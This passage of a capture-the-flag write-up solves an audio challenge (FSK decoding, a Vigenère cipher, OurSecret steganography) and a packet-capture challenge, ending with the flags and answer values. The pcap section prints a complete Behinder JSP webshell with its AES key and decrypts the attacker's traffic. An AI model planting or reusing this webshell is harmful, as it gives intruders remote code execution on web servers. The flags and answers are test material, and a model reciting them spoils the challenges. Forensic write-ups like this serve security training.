    segment = wave_data[i:i+interval]

    # Fast Fourier transform of the window
    fft_result = np.fft.fft(segment)

    # Frequency axis for the bins
    freqs = np.fft.fftfreq(len(segment), d=1/sample_rate)

    # Magnitude spectrum, positive frequencies only
    fft_magnitude = np.abs(fft_result)
    positive_freqs = freqs[:len(freqs)//2]
    positive_magnitude = fft_magnitude[:len(fft_magnitude)//2]

    # Frequency of the strongest bin
    peak_freq = positive_freqs[np.argmax(positive_magnitude)]

    # Nearer to tone A or to tone B?
    if np.abs(peak_freq - freq_a) < np.abs(peak_freq - freq_b):
        binary_frequencies.append('0')  # tone A
    else:
        binary_frequencies.append('1')  # tone B

# Join the bits into one string
binary_string = ''.join(binary_frequencies)

# Print the result
print("Final Binary String:")

Decoding the bit string as 8-bit ASCII gives:

YbAgLvWkQbFp qk k 2021 Gfgbyue gxriobzqgx hpyau utnkxmgz Jpwx Dfcmocn ngj Bn Flvytmc. Gh cu bnlkh hg apw Mlglsmg nbokp Lxjzwdw gl hbg Lnmzmvx. Apw cipgsm ciexj sg Fhvyy XT dfio Ahzawm 10 nubav Eseimv 26, 2021.

Tux yikbla zkw qsfjcsfxj e vntcdkxgts pkejxxwabw wx 1.3 lmjjwip apkuwl ohzayyq nzuvfbksw, bgjtmnmle Aupgb MB'w whtmkdma ydjniptzmhg, FwmDyzc, ohf Tutoptgk BjeiGB.

Gspoclow

Mal awbmcq hynlf mni lmvzq yj y qijgrvhx egw bvjepw aogruf fgpx zvl Rrss Qwswe (Pakr Salgmkr) ylr u jenwyxkhuo, kdyzzclp, aaw rsoxsg Usrbcfynln zove, Wpvy Hmyl (Lo Oeazpmx). Yywe liglu gwthtrpr xekdewgts ncbyxsemxz il cgfmcf vo oxisfbuo wkgf mhbgr'f eojxevvy msknohkoal or malqj tsspbya tukuyza fwmdl. Yjhbquta zlxr jwmvhl'r gncnq xgga hapwb er dwlut, gakc vhtm ly ennfyeinmk itvo wlrip'q gnteazzll bu bzomp bos-vo-qte mgmlzsmxgmbm. 

Oavg

Ilxg Gpwiyyl om Bhbn Ymrnl
I qyyle, vupdfhsi lvowdkv ufc yzuqxy eg tpz gp ejmczpefl grw bubwvpgeshee. Qxytbml pac gmjr upd qbyxtga mpdipgcl, je chywxlzmk k kclhfg aaw jimxyuaxib lonwrr mnem wyqnow fga nq phkyyx apa axrcpaiut qxymkxz. Qf dlc dowg os ygqbef kzkpjcbags, ux xiftpvk biqmzove vg nml ibzkemr mt bks qkkefl.

Ec Eorehwy cs Qbtk Qbhv
Sx yluopgrvgm egw kmlovkgbyf ybntk phtif glm lspgr gnxrl tdiq pvmk qbclyxtkxl bvlsp qfs zccrl gr bgzcjwsslhudlr hhwmtjtw. Rip jwzg uawkvpxub s nvykonkc gkgrlyvzekxgmb qjea lni kxswukxcb tlqm n lseee awox xm Qvyphnb Immr. Pvxvyclqyf bl akv rhbbzpyj gajwlfbbigxza kri qfcqeafx nik ypmjmi bchytmvggxbhu ifn yluopgrvgm tnkzcad sd fsl ioney.

Whflbzsre Nomuwbkj

WhecmA7DsE3rTf4i

Word lengths, spaces, digits and capitalisation are all preserved, so this is almost certainly a Vigenère cipher; brute-forcing the key on an online solver gives:

AnGeLiDeMiMi is a 2021 Chinese television drama starring Chen Zheyuan and Xu Mengjie. It is based on the Chinese novel Secrets in the Lattice. The series aired on Mango TV from August 10 until August 26, 2021.

The series has surpassed a cumulative viewership of 1.3 billion across various platforms, including Mango TV's domestic application, YouTube, and Thailand TrueID.

Synopsis

The series tells the story of a superior and unruly campus male god Zhou Siyue (Chen Zheyuan) and a headstrong, stubborn, and lovely Cinderella girl, Ding Xian (Xu Mengjie). From being mutually exclusive tablemates at school to becoming each other's lifelong companions in their journey through youth. Although they couldn't stand each other at first, they come to appreciate each other's strengths in their day-to-day interactions. 

Main

Chen Zheyuan as Zhou Siyue
A young, handsome scholar who exudes an air of aloofness and intelligence. Despite his cold and distant exterior, he possesses a gentle and determined nature that drives him to pursue his innermost desires. In the face of family challenges, he remains resolute in his pursuit of his dreams.

Xu Mengjie as Ding Xian
An unwavering and determined young woman who never turns away from challenges until she faces an insurmountable obstacle. Her life underwent a dramatic transformation when she relocated from a small town to Shenhai City. Influenced by her youthful impulsiveness she showcase her fierce determination and unwavering pursuit of her goals.

Something Password

SolveI7ToG3tFl4g
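The writeup recovers the key with an online solver and never prints it. Because both the ciphertext and the plaintext are on this page, the key can be read off directly: each cipher/plain letter pair leaks one key letter, and the key is the shortest period of that sequence. An added example (not the writeup's code) that does this on the first line of the text above; the key it recovers is YOUCANTGETTHISKEY, and vigenere_decrypt reproduces the plaintext with it. Digits and punctuation pass through untouched and do not consume key positions, which is why 2021 and the digits in WhecmA7DsE3rTf4i survive unchanged.

```python
import string

ALPHA = string.ascii_uppercase


def vigenere_decrypt(ciphertext: str, key: str) -> str:
    """Classic Vigenere: only letters are shifted and only letters advance the key;
    digits, spaces and punctuation pass through, and case is preserved."""
    out, ki = [], 0
    key = key.upper()
    for ch in ciphertext:
        if ch.isalpha() and ch.isascii():
            base = ord("A") if ch.isupper() else ord("a")
            shift = ord(key[ki % len(key)]) - ord("A")
            out.append(chr((ord(ch) - base - shift) % 26 + base))
            ki += 1
        else:
            out.append(ch)
    return "".join(out)


def recover_key(ciphertext: str, known_plaintext: str) -> str:
    """Known-plaintext attack: each letter pair leaks one key letter (cipher - plain);
    the key is the shortest period of that shift sequence."""
    shifts = []
    for c, p in zip(ciphertext, known_plaintext):
        if c.isalpha() and c.isascii():
            shifts.append(ALPHA[(ord(c.upper()) - ord(p.upper())) % 26])
    stream = "".join(shifts)
    for period in range(1, len(stream) + 1):
        if all(stream[i] == stream[i - period] for i in range(period, len(stream))):
            return stream[:period]
    return stream


# First line of the ciphertext/plaintext pair shown above
CIPHER_LINE = "YbAgLvWkQbFp qk k 2021 Gfgbyue gxriobzqgx hpyau utnkxmgz Jpwx Dfcmocn ngj Bn Flvytmc."
PLAIN_LINE = "AnGeLiDeMiMi is a 2021 Chinese television drama starring Chen Zheyuan and Xu Mengjie."

if __name__ == "__main__":
    key = recover_key(CIPHER_LINE, PLAIN_LINE)
    print(key)
    print(vigenere_decrypt(CIPHER_LINE, key))
```

A crib of one line is enough here only because the period (17) is shorter than the line; with a crib shorter than the key, recover_key returns the partial shift stream and a longer crib is needed before the period check can close.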

When the WAV was first examined, an unknown block of data starting with ž—º* was visible at the very end of the file; anyone who has met it before recognises this as the signature OurSecret leaves when it appends a hidden file to a carrier:


Decrypting it in OurSecret with that password (SolveI7ToG3tFl4g) recovers the hidden file, which contains the flag

NSSCTF{9c99897d-5ea3-481c-b0a5-029fec9eaf42}

mypcap

Question 1: which ports are open on the victim host? Submit them in ascending order, separated by commas.

Look at the scan packets that got a reply: open ports answer with SYN/ACK, closed ones with RST.


Filter on packets sent by the victim:

ip.src == 192.168.252.136


Three ports replied with SYN/ACK (ip.src == 192.168.252.136 && tcp.flags.syn == 1 && tcp.flags.ack == 1 narrows the view to exactly those), giving the answer

22,3306,8080

Question 2: mrl64 likes to keep the database password on the desktop, and the attacker found it; what is the database password?

An all-in-one traffic-analysis tool pulls out a password straight away:


The same value can be found by hand in the MySQL login packets:


9c2a09cdfcbd7da7d306ffbf77dad8608ee92bea

Unfortunately that is the root login, not the one asked for (and the 20-byte value is the mysql_native_password auth response, not a plaintext password). Continuing through the capture, the attack traffic includes the webshell the attacker uploaded:

<%@page import="java.util.*, javax.crypto.*, javax.crypto.spec.*"%>

<%!
    // Custom class loader: exposes defineClass so arbitrary bytecode can be loaded
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }

        // Define a class from raw bytes
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }
%>

<%
    // Only act on POST requests
    if (request.getMethod().equals("POST")) {
        // Key = first 16 characters of the 32-character MD5 of the connection password
        String k = "8a1e94c07e3fb7d5";

        // Store the key in the session
        session.putValue("u", k);

        // AES cipher instance (plain "AES" in Java means AES/ECB/PKCS5Padding)
        Cipher c = Cipher.getInstance("AES");

        // Initialise for decryption
        c.init(Cipher.DECRYPT_MODE, new SecretKeySpec(k.getBytes(), "AES"));

        // Read the Base64-encoded request body and decode it
        byte[] encryptedData = new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine());

        // Decrypt the payload
        byte[] decryptedData = c.doFinal(encryptedData);

        // Load the decrypted class with the custom loader and instantiate it
        Class<?> clazz = new U(this.getClass().getClassLoader()).g(decryptedData);
        Object instance = clazz.newInstance();

        // Calling equals() with the pageContext runs the payload
        instance.equals(pageContext);
    }
%>

This is a Behinder (冰蝎) webshell. Its traffic key is embedded in the JSP itself, so whoever captures the shell file can decrypt every request and response:

8a1e94c07e3fb7d5

The all-in-one tool's decryption of this traffic is not accurate, though:


So take the response body from the original capture and decrypt it by hand: Base64-decode it, then AES-decrypt with the key above (ECB with PKCS5 padding, the Java default):


sWZAhWwEZKAKCM5D0o0FfJ/pBmauGQWuRQhpdPtUopgKvh//Wwi4JQNwF9t80IuICWUZB54wVsLuLMzv74vRYmIXZ5jn1/pbg+UEPryUCtc=

Decrypting gives the response, whose fields are Base64-encoded once more:


{"msg":"bXlzcWwgcGFzc3dvcmQgaXMgbjFjZXA0U3MK","status":"c3VjY2Vzcw=="}

Base64-decoding the msg field gives the password:

mysql password is n1cep4Ss

Question 3: the attacker found an important piece of data in the database; what is it?

Filter for the MySQL traffic:


One of the result rows carries the important data:


Th1s_1s_Imp0Rt4Nt_D4Ta

Full answers:

# Question 1: which ports are open on the victim host? Submit them in ascending order, separated by commas
PORT = "22,3306,8080"    # string of open port, like "8000,8888,9999,10000"

# Question 2: mrl64 likes to keep the database password on the desktop, and the attacker found it; what is the database password?
PASSWORD = "n1cep4Ss" # string of password

# Question 3: the attacker found an important piece of data in the database; what is it?
DATA = "Th1s_1s_Imp0Rt4Nt_D4Ta" # string of important data

Running the check script yields the flag

NSSCTF{703663c4-1ff1-4c51-83b8-0f4303e82659}